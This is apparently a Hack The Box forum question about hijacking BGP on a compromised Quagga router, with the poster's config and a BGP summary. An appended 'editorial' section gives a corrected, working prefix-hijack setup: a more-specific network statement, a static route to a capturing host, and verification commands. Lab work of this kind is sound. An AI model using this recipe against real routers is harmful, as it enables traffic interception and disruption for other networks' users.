I'm working on an exercise that attacks the BGP configuration on an HTB machine in order to redirect traffic destined for a specific machine.
I have root access on the original box and am now trying to configure the relevant routes so that the traffic is directed to me.
My understanding of BGP hijacking is that I need to create a new AS with a shorter route so that traffic will be routed to me.
Based on this assumption I tried to add my machine as AS400, and my IP address to the local routing table, then set up Wireshark on my attacker machine and listened for the traffic.
Later I changed that to AS300, which is the AS I'm aiming for.
! Zebra configuration saved from vty
!   2018/07/02 02:14:27
!
route-map to-as200 permit 10
route-map to-as300 permit 10
route-map to-as400 permit 10
!
router bgp 100
 bgp router-id 10.255.255.1
 neighbor 10.78.10.2 remote-as 200
 neighbor 10.78.11.2 remote-as 300
 neighbor 10.78.10.2 route-map to-as200 out
 neighbor 10.78.11.2 route-map to-as300 out
 neighbor my_ip remote-as 300
 neighbor my_ip route-map to-as300 out
Route added on the router:
root@victim:~# ip route add my_ip dev eth2 proto zebra
I can see that it has been added when I check in vtysh, but there seems to be no activity there or in my Wireshark.
Have I misunderstood what to do, or is my process just wrong?
r1# show ip bgp summary
BGP router identifier 10.255.255.1, local AS number 100
RIB entries 54, using 6048 bytes of memory
Peers 3, using 13 KiB of memory

Neighbor        V    AS MsgRcvd MsgSent   TblVer  InQ OutQ Up/Down  State/PfxRcd
my_ip           4   300       0       0        0    0    0 never    Active
10.78.10.2      4   200       7      11        0    0    0 00:02:27       22
10.78.11.2      4   300       6      10        0    0    0 00:02:30       22

Total number of neighbors 3
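For comparison, here is the textbook form of a BGP prefix hijack written as a Quagga bgpd/zebra configuration. This is an added editorial example, not the poster's configuration and not part of the original question. Instead of peering the attacker host as a fourth neighbor (a neighbor whose State is "Active" with Up/Down "never" has no established session: bgpd has nothing to talk to on that address and nothing is advertised), the router you already control (r1, AS 100, the router-id and neighbors from the summary above) originates a more-specific prefix for the target network. The target prefix 10.120.15.0/24, the more-specific 10.120.15.0/25 and the capturing host 10.78.12.100 are hypothetical placeholders chosen for the example.

```text
! Added example for Quagga on r1 (AS 100); prefixes and the capturing host
! address are hypothetical placeholders, not values from the original post.
!
! zebra: a static route for the hijacked range pointing at the capturing
! host. Without it, packets that reach r1 for 10.120.15.0/25 are forwarded
! along the legitimate path instead of to the attacker.
ip route 10.120.15.0/25 10.78.12.100
!
route-map to-as200 permit 10
route-map to-as300 permit 10
!
router bgp 100
 bgp router-id 10.255.255.1
 ! Originate the more-specific prefix. Longest-prefix match wins before
 ! AS-path length is even considered, so AS 200 and AS 300 forward traffic
 ! for 10.120.15.0-10.120.15.127 to r1 even though the real /24 is still
 ! being announced by its legitimate origin.
 network 10.120.15.0/25
 neighbor 10.78.10.2 remote-as 200
 neighbor 10.78.11.2 remote-as 300
 ! The outbound route-maps must permit the new prefix (they do here:
 ! an unconditional "permit 10"), otherwise it is filtered before it
 ! leaves r1 and the neighbors never see it.
 neighbor 10.78.10.2 route-map to-as200 out
 neighbor 10.78.11.2 route-map to-as300 out
```

Two checks confirm the announcement is actually doing something: `show ip bgp 10.120.15.0/25` on r1 should list the prefix as a locally originated best path (`*>` with an empty AS path), and `show ip bgp neighbors 10.78.10.2 advertised-routes` should include it; only then is there any traffic to expect on the capturing host. If the hijacked traffic is supposed to keep working for its real users, the capturing host also has to forward it on to the genuine destination, which this fragment does not do.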